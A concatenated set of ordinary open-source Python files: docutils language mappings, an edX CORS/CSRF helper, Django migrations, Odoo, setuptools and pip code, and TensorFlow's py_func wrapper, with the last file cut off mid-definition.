# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Polish-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
# language-dependent: fixed
u'uwaga': 'attention',
u'ostro\u017cnie': 'caution',
u'niebezpiecze\u0144stwo': 'danger',
u'b\u0142\u0105d': 'error',
u'wskaz\u00f3wka': 'hint',
u'wa\u017cne': 'important',
u'przypis': 'note',
u'rada': 'tip',
u'ostrze\u017cenie': 'warning',
u'upomnienie': 'admonition',
u'ramka': 'sidebar',
u'temat': 'topic',
u'blok-linii': 'line-block',
u'sparsowany-litera\u0142': 'parsed-literal',
u'rubryka': 'rubric',
u'epigraf': 'epigraph',
u'highlights': 'highlights', # FIXME no polish equivalent?
u'pull-quote': 'pull-quote', # FIXME no polish equivalent?
u'z\u0142o\u017cony': 'compound',
u'kontener': 'container',
#'questions': 'questions',
u'tabela': 'table',
u'tabela-csv': 'csv-table',
u'tabela-listowa': 'list-table',
#'qa': 'questions',
#'faq': 'questions',
u'meta': 'meta',
#'imagemap': 'imagemap',
u'obraz': 'image',
u'rycina': 'figure',
u'do\u0142\u0105cz': 'include',
u'surowe': 'raw',
u'zast\u0105p': 'replace',
u'unikod': 'unicode',
u'data': 'date',
u'klasa': 'class',
u'rola': 'role',
u'rola-domy\u015blna': 'default-role',
u'tytu\u0142': 'title',
u'tre\u015b\u0107': 'contents',
u'sectnum': 'sectnum',
u'numeracja-sekcji': 'sectnum',
u'nag\u0142\u00f3wek': 'header',
u'stopka': 'footer',
#'footnotes': 'footnotes',
#'citations': 'citations',
u'target-notes': 'target-notes', # FIXME no polish equivalent?
u'restructuredtext-test-directive': 'restructuredtext-test-directive'}
"""Polish name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
# language-dependent: fixed
u'skr\u00f3t': 'abbreviation',
u'akronim': 'acronym',
u'indeks': 'index',
u'indeks-dolny': 'subscript',
u'indeks-g\u00f3rny': 'superscript',
u'referencja-tytu\u0142': 'title-reference',
u'referencja-pep': 'pep-reference',
u'referencja-rfc': 'rfc-reference',
u'podkre\u015blenie': 'emphasis',
u'wyt\u0142uszczenie': 'strong',
u'dos\u0142ownie': 'literal',
u'referencja-nazwana': 'named-reference',
u'referencja-anonimowa': 'anonymous-reference',
u'referencja-przypis': 'footnote-reference',
u'referencja-cytat': 'citation-reference',
u'referencja-podstawienie': 'substitution-reference',
u'cel': 'target',
u'referencja-uri': 'uri-reference',
u'uri': 'uri-reference',
u'url': 'uri-reference',
u'surowe': 'raw',}
"""Mapping of Polish role names to canonical role names for interpreted text.
"""
|
cyanna/edx-platform
|
refs/heads/master
|
common/djangoapps/cors_csrf/helpers.py
|
162
|
"""Helper methods for CORS and CSRF checks. """
import logging
import urlparse
import contextlib
from django.conf import settings
log = logging.getLogger(__name__)
def is_cross_domain_request_allowed(request):
"""Check whether we should allow the cross-domain request.
We allow a cross-domain request only if:
1) The request is made securely and the referer has "https://" as the protocol.
2) The referer domain has been whitelisted.
Arguments:
request (HttpRequest)
Returns:
bool
"""
referer = request.META.get('HTTP_REFERER')
referer_parts = urlparse.urlparse(referer) if referer else None
referer_hostname = referer_parts.hostname if referer_parts is not None else None
# Use CORS_ALLOW_INSECURE *only* for development and testing environments;
# it should never be enabled in production.
if not getattr(settings, 'CORS_ALLOW_INSECURE', False):
if not request.is_secure():
log.debug(
u"Request is not secure, so we cannot send the CSRF token. "
u"For testing purposes, you can disable this check by setting "
u"`CORS_ALLOW_INSECURE` to True in the settings"
)
return False
if not referer:
log.debug(u"No referer provided over a secure connection, so we cannot check the protocol.")
return False
if not referer_parts.scheme == 'https':
log.debug(u"Referer '%s' must have the scheme 'https'")
return False
domain_is_whitelisted = (
getattr(settings, 'CORS_ORIGIN_ALLOW_ALL', False) or
referer_hostname in getattr(settings, 'CORS_ORIGIN_WHITELIST', [])
)
if not domain_is_whitelisted:
if referer_hostname is None:
# If no referer is specified, we can't check if it's a cross-domain
# request or not.
log.debug(u"Referrer hostname is `None`, so it is not on the whitelist.")
elif referer_hostname != request.get_host():
log.info(
(
u"Domain '%s' is not on the cross domain whitelist. "
u"Add the domain to `CORS_ORIGIN_WHITELIST` or set "
u"`CORS_ORIGIN_ALLOW_ALL` to True in the settings."
), referer_hostname
)
else:
log.debug(
(
u"Domain '%s' is the same as the hostname in the request, "
u"so we are not going to treat it as a cross-domain request."
), referer_hostname
)
return False
return True
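# Illustrative sketch (an assumption, not part of the original module): a view
# serving cross-domain requests could guard itself with the helper above
# roughly as follows; the view name and response classes are illustrative only.
#
#   from django.http import HttpResponse, HttpResponseForbidden
#
#   def csrf_token_view(request):
#       if not is_cross_domain_request_allowed(request):
#           return HttpResponseForbidden()
#       return HttpResponse(status=204)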
@contextlib.contextmanager
def skip_cross_domain_referer_check(request):
"""Skip the cross-domain CSRF referer check.
Django's CSRF middleware performs the referer check
only when the request is made over a secure connection.
To skip the check, we patch `request.is_secure()` to
False.
"""
is_secure_default = request.is_secure
request.is_secure = lambda: False
try:
yield
finally:
request.is_secure = is_secure_default
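# Illustrative sketch (an assumption, not part of the original module): the
# context manager above is intended to wrap code that would otherwise trigger
# Django's strict referer check over HTTPS, e.g.
#
#   from django.middleware.csrf import CsrfViewMiddleware
#
#   with skip_cross_domain_referer_check(request):
#       reason = CsrfViewMiddleware().process_view(request, view_func, (), {})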
|
marceloomens/appointments
|
refs/heads/master
|
appointments/apps/timeslots/migrations/0004_auto_20141103_0840.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('timeslots', '0003_auto_20141102_0853'),
]
operations = [
migrations.AlterField(
model_name='holiday',
name='reason',
field=models.CharField(default=b'', max_length=128, verbose_name='reason', blank=True),
preserve_default=True,
),
]
|
hmen89/odoo
|
refs/heads/master
|
addons/sale_margin/sale_margin.py
|
65
|
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class sale_order_line(osv.osv):
_inherit = "sale.order.line"
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, context=None):
res = super(sale_order_line, self).product_id_change(cr, uid, ids, pricelist, product, qty=qty,
uom=uom, qty_uos=qty_uos, uos=uos, name=name, partner_id=partner_id,
lang=lang, update_tax=update_tax, date_order=date_order, packaging=packaging, fiscal_position=fiscal_position, flag=flag, context=context)
if not pricelist:
return res
frm_cur = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id
to_cur = self.pool.get('product.pricelist').browse(cr, uid, [pricelist])[0].currency_id.id
if product:
purchase_price = self.pool.get('product.product').browse(cr, uid, product).standard_price
price = self.pool.get('res.currency').compute(cr, uid, frm_cur, to_cur, purchase_price, round=False)
res['value'].update({'purchase_price': price})
return res
def _product_margin(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = 0
if line.product_id:
if line.purchase_price:
res[line.id] = round((line.price_unit*line.product_uos_qty*(100.0-line.discount)/100.0) -(line.purchase_price*line.product_uos_qty), 2)
else:
res[line.id] = round((line.price_unit*line.product_uos_qty*(100.0-line.discount)/100.0) -(line.product_id.standard_price*line.product_uos_qty), 2)
return res
_columns = {
'margin': fields.function(_product_margin, string='Margin',
store = True),
'purchase_price': fields.float('Cost Price', digits=(16,2))
}
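    # Worked example (illustrative only, not part of the original module): with
    # a unit price of 100.0, a quantity of 2, a 10% discount and a cost price of
    # 60.0, _product_margin above yields
    #   round(100.0 * 2 * (100.0 - 10.0) / 100.0 - 60.0 * 2, 2) == 60.0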
class sale_order(osv.osv):
_inherit = "sale.order"
def _product_margin(self, cr, uid, ids, field_name, arg, context=None):
result = {}
for sale in self.browse(cr, uid, ids, context=context):
result[sale.id] = 0.0
for line in sale.order_line:
result[sale.id] += line.margin or 0.0
return result
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
_columns = {
'margin': fields.function(_product_margin, string='Margin', help="It gives profitability by calculating the difference between the Unit Price and the cost price.", store={
'sale.order.line': (_get_order, ['margin'], 20),
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 20),
}),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
buhii/tomato
|
refs/heads/master
|
tomato/__init__.py
|
1
|
from tomato.swf_processor import Swf
from tomato.swf_image_replacer import SwfImage
from tomato.swf_injector import create_swf
|
Jollytown/Garuda
|
refs/heads/master
|
server/garuda/lib/python2.7/site-packages/setuptools/tests/test_find_packages.py
|
151
|
"""Tests for setuptools.find_packages()."""
import os
import sys
import shutil
import tempfile
import platform
import pytest
import setuptools
from setuptools import find_packages
find_420_packages = setuptools.PEP420PackageFinder.find
# modeled after CPython's test.support.can_symlink
def can_symlink():
TESTFN = tempfile.mktemp()
symlink_path = TESTFN + "can_symlink"
try:
os.symlink(TESTFN, symlink_path)
can = True
except (OSError, NotImplementedError, AttributeError):
can = False
else:
os.remove(symlink_path)
globals().update(can_symlink=lambda: can)
return can
def has_symlink():
bad_symlink = (
# Windows symlink directory detection is broken on Python 3.2
platform.system() == 'Windows' and sys.version_info[:2] == (3,2)
)
return can_symlink() and not bad_symlink
class TestFindPackages:
def setup_method(self, method):
self.dist_dir = tempfile.mkdtemp()
self._make_pkg_structure()
def teardown_method(self, method):
shutil.rmtree(self.dist_dir)
def _make_pkg_structure(self):
"""Make basic package structure.
dist/
docs/
conf.py
pkg/
__pycache__/
nspkg/
mod.py
subpkg/
assets/
asset
__init__.py
setup.py
"""
self.docs_dir = self._mkdir('docs', self.dist_dir)
self._touch('conf.py', self.docs_dir)
self.pkg_dir = self._mkdir('pkg', self.dist_dir)
self._mkdir('__pycache__', self.pkg_dir)
self.ns_pkg_dir = self._mkdir('nspkg', self.pkg_dir)
self._touch('mod.py', self.ns_pkg_dir)
self.sub_pkg_dir = self._mkdir('subpkg', self.pkg_dir)
self.asset_dir = self._mkdir('assets', self.sub_pkg_dir)
self._touch('asset', self.asset_dir)
self._touch('__init__.py', self.sub_pkg_dir)
self._touch('setup.py', self.dist_dir)
def _mkdir(self, path, parent_dir=None):
if parent_dir:
path = os.path.join(parent_dir, path)
os.mkdir(path)
return path
def _touch(self, path, dir_=None):
if dir_:
path = os.path.join(dir_, path)
fp = open(path, 'w')
fp.close()
return path
def test_regular_package(self):
self._touch('__init__.py', self.pkg_dir)
packages = find_packages(self.dist_dir)
assert packages == ['pkg', 'pkg.subpkg']
def test_exclude(self):
self._touch('__init__.py', self.pkg_dir)
packages = find_packages(self.dist_dir, exclude=('pkg.*',))
assert packages == ['pkg']
def test_include_excludes_other(self):
"""
If include is specified, other packages should be excluded.
"""
self._touch('__init__.py', self.pkg_dir)
alt_dir = self._mkdir('other_pkg', self.dist_dir)
self._touch('__init__.py', alt_dir)
packages = find_packages(self.dist_dir, include=['other_pkg'])
assert packages == ['other_pkg']
def test_dir_with_dot_is_skipped(self):
shutil.rmtree(os.path.join(self.dist_dir, 'pkg/subpkg/assets'))
data_dir = self._mkdir('some.data', self.pkg_dir)
self._touch('__init__.py', data_dir)
self._touch('file.dat', data_dir)
packages = find_packages(self.dist_dir)
assert 'pkg.some.data' not in packages
def test_dir_with_packages_in_subdir_is_excluded(self):
"""
Ensure that a package in a non-package such as build/pkg/__init__.py
is excluded.
"""
build_dir = self._mkdir('build', self.dist_dir)
build_pkg_dir = self._mkdir('pkg', build_dir)
self._touch('__init__.py', build_pkg_dir)
packages = find_packages(self.dist_dir)
assert 'build.pkg' not in packages
@pytest.mark.skipif(not has_symlink(), reason='Symlink support required')
def test_symlinked_packages_are_included(self):
"""
A symbolically-linked directory should be treated like any other
directory when matched as a package.
Create a link from lpkg -> pkg.
"""
self._touch('__init__.py', self.pkg_dir)
linked_pkg = os.path.join(self.dist_dir, 'lpkg')
os.symlink('pkg', linked_pkg)
assert os.path.isdir(linked_pkg)
packages = find_packages(self.dist_dir)
assert 'lpkg' in packages
def _assert_packages(self, actual, expected):
assert set(actual) == set(expected)
def test_pep420_ns_package(self):
packages = find_420_packages(
self.dist_dir, include=['pkg*'], exclude=['pkg.subpkg.assets'])
self._assert_packages(packages, ['pkg', 'pkg.nspkg', 'pkg.subpkg'])
def test_pep420_ns_package_no_includes(self):
packages = find_420_packages(
self.dist_dir, exclude=['pkg.subpkg.assets'])
self._assert_packages(packages, ['docs', 'pkg', 'pkg.nspkg', 'pkg.subpkg'])
def test_pep420_ns_package_no_includes_or_excludes(self):
packages = find_420_packages(self.dist_dir)
expected = [
'docs', 'pkg', 'pkg.nspkg', 'pkg.subpkg', 'pkg.subpkg.assets']
self._assert_packages(packages, expected)
def test_regular_package_with_nested_pep420_ns_packages(self):
self._touch('__init__.py', self.pkg_dir)
packages = find_420_packages(
self.dist_dir, exclude=['docs', 'pkg.subpkg.assets'])
self._assert_packages(packages, ['pkg', 'pkg.nspkg', 'pkg.subpkg'])
def test_pep420_ns_package_no_non_package_dirs(self):
shutil.rmtree(self.docs_dir)
shutil.rmtree(os.path.join(self.dist_dir, 'pkg/subpkg/assets'))
packages = find_420_packages(self.dist_dir)
self._assert_packages(packages, ['pkg', 'pkg.nspkg', 'pkg.subpkg'])
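# Illustrative sketch (not part of the original test module): in a setup.py the
# finder exercised above is typically used along these lines; the project name
# and exclude pattern are assumptions for illustration only.
#
#   from setuptools import setup, find_packages
#   setup(name='example', packages=find_packages(exclude=['tests*']))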
|
aidanlister/django
|
refs/heads/master
|
django/contrib/auth/migrations/0003_alter_user_email_max_length.py
|
586
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('auth', '0002_alter_permission_name_max_length'),
]
operations = [
migrations.AlterField(
model_name='user',
name='email',
field=models.EmailField(max_length=254, verbose_name='email address', blank=True),
),
]
|
bzennn/blog_flask
|
refs/heads/master
|
python/lib/python3.5/site-packages/pip/commands/show.py
|
344
|
from __future__ import absolute_import
from email.parser import FeedParser
import logging
import os
from pip.basecommand import Command
from pip.status_codes import SUCCESS, ERROR
from pip._vendor import pkg_resources
from pip._vendor.packaging.utils import canonicalize_name
logger = logging.getLogger(__name__)
class ShowCommand(Command):
"""Show information about one or more installed packages."""
name = 'show'
usage = """
%prog [options] <package> ..."""
summary = 'Show information about installed packages.'
def __init__(self, *args, **kw):
super(ShowCommand, self).__init__(*args, **kw)
self.cmd_opts.add_option(
'-f', '--files',
dest='files',
action='store_true',
default=False,
help='Show the full list of installed files for each package.')
self.parser.insert_option_group(0, self.cmd_opts)
def run(self, options, args):
if not args:
logger.warning('ERROR: Please provide a package name or names.')
return ERROR
query = args
results = search_packages_info(query)
if not print_results(
results, list_files=options.files, verbose=options.verbose):
return ERROR
return SUCCESS
def search_packages_info(query):
"""
Gather details from installed distributions. Print distribution name,
    version, location, and installed files. Listing installed files requires a
    pip-generated 'installed-files.txt' in the distribution's '.egg-info'
    directory.
"""
installed = {}
for p in pkg_resources.working_set:
installed[canonicalize_name(p.project_name)] = p
query_names = [canonicalize_name(name) for name in query]
for dist in [installed[pkg] for pkg in query_names if pkg in installed]:
package = {
'name': dist.project_name,
'version': dist.version,
'location': dist.location,
'requires': [dep.project_name for dep in dist.requires()],
}
file_list = None
metadata = None
if isinstance(dist, pkg_resources.DistInfoDistribution):
# RECORDs should be part of .dist-info metadatas
if dist.has_metadata('RECORD'):
lines = dist.get_metadata_lines('RECORD')
paths = [l.split(',')[0] for l in lines]
paths = [os.path.join(dist.location, p) for p in paths]
file_list = [os.path.relpath(p, dist.location) for p in paths]
if dist.has_metadata('METADATA'):
metadata = dist.get_metadata('METADATA')
else:
# Otherwise use pip's log for .egg-info's
if dist.has_metadata('installed-files.txt'):
paths = dist.get_metadata_lines('installed-files.txt')
paths = [os.path.join(dist.egg_info, p) for p in paths]
file_list = [os.path.relpath(p, dist.location) for p in paths]
if dist.has_metadata('PKG-INFO'):
metadata = dist.get_metadata('PKG-INFO')
if dist.has_metadata('entry_points.txt'):
entry_points = dist.get_metadata_lines('entry_points.txt')
package['entry_points'] = entry_points
if dist.has_metadata('INSTALLER'):
for line in dist.get_metadata_lines('INSTALLER'):
if line.strip():
package['installer'] = line.strip()
break
# @todo: Should pkg_resources.Distribution have a
# `get_pkg_info` method?
feed_parser = FeedParser()
feed_parser.feed(metadata)
pkg_info_dict = feed_parser.close()
for key in ('metadata-version', 'summary',
'home-page', 'author', 'author-email', 'license'):
package[key] = pkg_info_dict.get(key)
# It looks like FeedParser cannot deal with repeated headers
classifiers = []
for line in metadata.splitlines():
if line.startswith('Classifier: '):
classifiers.append(line[len('Classifier: '):])
package['classifiers'] = classifiers
if file_list:
package['files'] = sorted(file_list)
yield package
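# Illustrative sketch (not part of the original module): the generator above can
# be consumed directly, e.g.
#
#   for pkg in search_packages_info(['pip']):
#       print('%s %s' % (pkg['name'], pkg['version']))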
def print_results(distributions, list_files=False, verbose=False):
"""
    Print the information for the installed distributions that were found.
"""
results_printed = False
for i, dist in enumerate(distributions):
results_printed = True
if i > 0:
logger.info("---")
logger.info("Name: %s", dist.get('name', ''))
logger.info("Version: %s", dist.get('version', ''))
logger.info("Summary: %s", dist.get('summary', ''))
logger.info("Home-page: %s", dist.get('home-page', ''))
logger.info("Author: %s", dist.get('author', ''))
logger.info("Author-email: %s", dist.get('author-email', ''))
logger.info("License: %s", dist.get('license', ''))
logger.info("Location: %s", dist.get('location', ''))
logger.info("Requires: %s", ', '.join(dist.get('requires', [])))
if verbose:
logger.info("Metadata-Version: %s",
dist.get('metadata-version', ''))
logger.info("Installer: %s", dist.get('installer', ''))
logger.info("Classifiers:")
for classifier in dist.get('classifiers', []):
logger.info(" %s", classifier)
logger.info("Entry-points:")
for entry in dist.get('entry_points', []):
logger.info(" %s", entry.strip())
if list_files:
logger.info("Files:")
for line in dist.get('files', []):
logger.info(" %s", line.strip())
if "files" not in dist:
logger.info("Cannot locate installed-files.txt")
return results_printed
|
rebstar6/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/tools/py/testing/root/test_py_imports.py
|
163
|
import py
import types
import sys
def checksubpackage(name):
obj = getattr(py, name)
if hasattr(obj, '__map__'): # isinstance(obj, Module):
keys = dir(obj)
assert len(keys) > 0
print (obj.__map__)
for name in list(obj.__map__):
assert hasattr(obj, name), (obj, name)
def test_dir():
for name in dir(py):
if not name.startswith('_'):
yield checksubpackage, name
def test_virtual_module_identity():
from py import path as path1
from py import path as path2
assert path1 is path2
from py.path import local as local1
from py.path import local as local2
assert local1 is local2
def test_importall():
base = py._pydir
nodirs = [
]
if sys.version_info >= (3,0):
nodirs.append(base.join('_code', '_assertionold.py'))
else:
nodirs.append(base.join('_code', '_assertionnew.py'))
def recurse(p):
return p.check(dotfile=0) and p.basename != "attic"
for p in base.visit('*.py', recurse):
if p.basename == '__init__.py':
continue
relpath = p.new(ext='').relto(base)
if base.sep in relpath: # not py/*.py itself
for x in nodirs:
if p == x or p.relto(x):
break
else:
relpath = relpath.replace(base.sep, '.')
modpath = 'py.%s' % relpath
try:
check_import(modpath)
except py.test.skip.Exception:
pass
def check_import(modpath):
py.builtin.print_("checking import", modpath)
assert __import__(modpath)
def test_all_resolves():
seen = py.builtin.set([py])
lastlength = None
while len(seen) != lastlength:
lastlength = len(seen)
for item in py.builtin.frozenset(seen):
for value in item.__dict__.values():
if isinstance(value, type(py.test)):
seen.add(value)
|
zahari/samba
|
refs/heads/master
|
ctdb/tests/takeover/simulation/nondet_path_01.py
|
31
|
#!/usr/bin/env python
# This is a contrived example that makes the balancing algorithm fail
# for nondeterministic IPs (run with "-dv --nd" to see the failure).
from ctdb_takeover import Cluster, Node, process_args
process_args()
addresses1 = ['A', 'B', 'C', 'D']
addresses2 = ['B', 'E', 'F']
c = Cluster()
for i in range(2):
c.add_node(Node(addresses1))
c.add_node(Node(addresses2))
c.recover()
c.unhealthy(1)
c.recover()
c.healthy(1)
c.recover()
|
ibmsoe/tensorflow
|
refs/heads/master
|
tensorflow/python/ops/script_ops.py
|
32
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Script Language Operators. See the @{python/script_ops} guide.
@@py_func
"""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import numpy as np
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import gen_script_ops
class FuncRegistry(object):
"""A helper class to keep track of registered py functions.
FuncRegistry keeps a map from unique tokens (string) to python
functions, which takes numpy arrays and outputs numpy arrays.
"""
def __init__(self):
self._lock = threading.Lock()
self._unique_id = 0 # GUARDED_BY(self._lock)
self._funcs = {}
def insert(self, func):
"""Registers `func` and returns a unique token for this entry."""
token = self._next_unique_token()
self._funcs[token] = func
return token
def remove(self, token):
"""Removes the registered function corresponding to `token`."""
self._funcs.pop(token, None)
@staticmethod
def _convert(value):
"""Converts an arg to numpy, avoiding dangerous string and unicode dtypes.
Numpy pads with zeros when using string and unicode dtypes if different
components of a tensor have different lengths. This is bad: ignoring the
padding is wrong for text data, and removing the padding is wrong for binary
data. To avoid this bug, we redo the conversion using an object dtype.
Args:
value: Value to convert to a numpy array.
Returns:
A numpy array.
"""
result = np.asarray(value, order="C")
if result.dtype.char in "SU" and result is not value:
return np.asarray(value, order="C", dtype=object)
return result
def __call__(self, token, args):
"""Calls the registered function for `token` with args."""
func = self._funcs[token]
if func is None:
raise ValueError("callback %s is not found" % token)
ret = func(*args)
# Ensures that we return either a single numpy array or a list of numpy
# arrays.
if isinstance(ret, (tuple, list)):
return [self._convert(x) for x in ret]
else:
return self._convert(ret)
def size(self):
"""Returns how many functions are currently registered."""
return len(self._funcs)
def _next_unique_token(self):
"""Returns a unique token."""
with self._lock:
uid = self._unique_id
self._unique_id += 1
return "pyfunc_%d" % uid
# Global registry for py functions.
_py_funcs = FuncRegistry()
pywrap_tensorflow.InitializePyTrampoline(_py_funcs)
class CleanupFunc(object):
"""A helper class to remove a registered function from _py_funcs."""
def __init__(self, token):
self._token = token
def __del__(self):
_py_funcs.remove(self._token)
def py_func(func, inp, Tout, stateful=True, name=None):
"""Wraps a python function and uses it as a TensorFlow op.
Given a python function `func`, which takes numpy arrays as its
inputs and returns numpy arrays as its outputs, wrap this function as an
operation in a TensorFlow graph. The following snippet constructs a simple
  TensorFlow graph that invokes the `np.sinh()` NumPy function as an operation
in the graph:
```python
def my_func(x):
# x will be a numpy array with the contents of the placeholder below
return np.sinh(x)
inp = tf.placeholder(tf.float32)
y = tf.py_func(my_func, [inp], tf.float32)
```
**N.B.** The `tf.py_func()` operation has the following known limitations:
* The body of the function (i.e. `func`) will not be serialized in a
`GraphDef`. Therefore, you should not use this function if you need to
serialize your model and restore it in a different environment.
* The operation must run in the same address space as the Python program
that calls `tf.py_func()`. If you are using distributed TensorFlow, you
must run a `tf.train.Server` in the same process as the program that calls
`tf.py_func()` and you must pin the created operation to a device in that
server (e.g. using `with tf.device():`).
Args:
func: A Python function, which accepts a list of NumPy `ndarray` objects
having element types that match the corresponding `tf.Tensor` objects
in `inp`, and returns a list of `ndarray` objects (or a single `ndarray`)
having element types that match the corresponding values in `Tout`.
inp: A list of `Tensor` objects.
Tout: A list or tuple of tensorflow data types or a single tensorflow data
type if there is only one, indicating what `func` returns.
stateful: (Boolean.) If True, the function should be considered stateful.
If a function is stateless, when given the same input it will return the
same output and have no observable side effects. Optimizations such as
common subexpression elimination are only performed on stateless
operations.
name: A name for the operation (optional).
Returns:
A list of `Tensor` or a single `Tensor` which `func` computes.
"""
token = _py_funcs.insert(func)
# We tie the registered function's life-time with the current
# default graph. I.e., when the current graph is destroyed, we
# should remove its py funcs.
g = ops.get_default_graph()
# pylint: disable=protected-access
while isinstance(g, function._FuncGraph):
# If the py_func was declared inside a _FuncGraph, its lifetime should be
# bound to that of the outer graph instead.
g = g._outer_graph
cleanup = CleanupFunc(token)
# TODO(zhifengc): Consider adding a Graph method to collect
# `cleanup` objects in one of its member.
if not hasattr(g, "_cleanup_py_funcs_used_in_graph"):
g._cleanup_py_funcs_used_in_graph = []
# When g is destroyed, elements in _cleanup_py_funcs_used_in_graph
# will be destroyed and their __del__ will remove the 'token' from
# the funcs registry.
g._cleanup_py_funcs_used_in_graph.append(cleanup)
# pylint: enable=protected-access
if isinstance(Tout, (list, tuple)):
is_list_or_tuple = True
else:
Tout = [Tout]
is_list_or_tuple = False
# pylint: disable=protected-access
if stateful:
result = gen_script_ops._py_func(
input=inp, token=token, Tout=Tout, name=name)
else:
result = gen_script_ops._py_func_stateless(
input=inp, token=token, Tout=Tout, name=name)
# pylint: enable=protected-access
return result if is_list_or_tuple else result[0]
ops.NotDifferentiable("PyFunc")
ops.NotDifferentiable("PyFuncStateless")
|
willingc/oh-mainline
|
refs/heads/master
|
mysite/profile/migrations/0059_delete_blank_tags.py
|
17
|
# This file is part of OpenHatch.
# Copyright (C) 2009 OpenHatch, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from south.db import db
from django.db import models
from mysite.profile.models import *
class Migration:
no_dry_run = True
def forwards(self, orm):
# Changing field 'DataImportAttempt.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 51, 32, 968240)))
db.alter_column('profile_dataimportattempt', 'date_created', orm['profile.dataimportattempt:date_created'])
# Changing field 'PortfolioEntry.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 51, 33, 603219)))
db.alter_column('profile_portfolioentry', 'date_created', orm['profile.portfolioentry:date_created'])
# Changing field 'Citation.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 51, 33, 672464)))
db.alter_column('profile_citation', 'date_created', orm['profile.citation:date_created'])
for tag in orm['profile.tag'].objects.filter(text=''):
tag.delete()
def backwards(self, orm):
# Changing field 'DataImportAttempt.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 25, 13, 868366)))
db.alter_column('profile_dataimportattempt', 'date_created', orm['profile.dataimportattempt:date_created'])
# Changing field 'PortfolioEntry.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 25, 13, 518378)))
db.alter_column('profile_portfolioentry', 'date_created', orm['profile.portfolioentry:date_created'])
# Changing field 'Citation.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 25, 14, 117042)))
db.alter_column('profile_citation', 'date_created', orm['profile.citation:date_created'])
models = {
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
